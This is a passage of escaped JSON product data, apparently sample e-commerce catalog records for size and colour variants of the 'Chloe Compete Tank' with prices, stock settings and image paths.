Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1709\":{\"sku\":\"WT06-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-M-Red\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1710\":{\"sku\":\"WT06-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-M-Yellow\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1711\":{\"sku\":\"WT06-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-L-Blue\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1712\":{\"sku\":\"WT06-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-L-Red\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1713\":{\"sku\":\"WT06-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-L-Yellow\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1714\":{\"sku\":\"WT06-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XL-Blue\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1715\":{\"sku\":\"WT06-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XL-Red\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1716\":{\"sku\":\"WT06-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank-XL-Yellow\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.<\\/p>\\n<p>&bull; Royal blue tank top - nylon\\/spandex.<br \\/>&bull; Flatlock stitching.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Ergonomic seaming. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chloe-compete-tank-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1717\":{\"sku\":\"WT06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Chloe Compete Tank\",\"description\":\"<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh 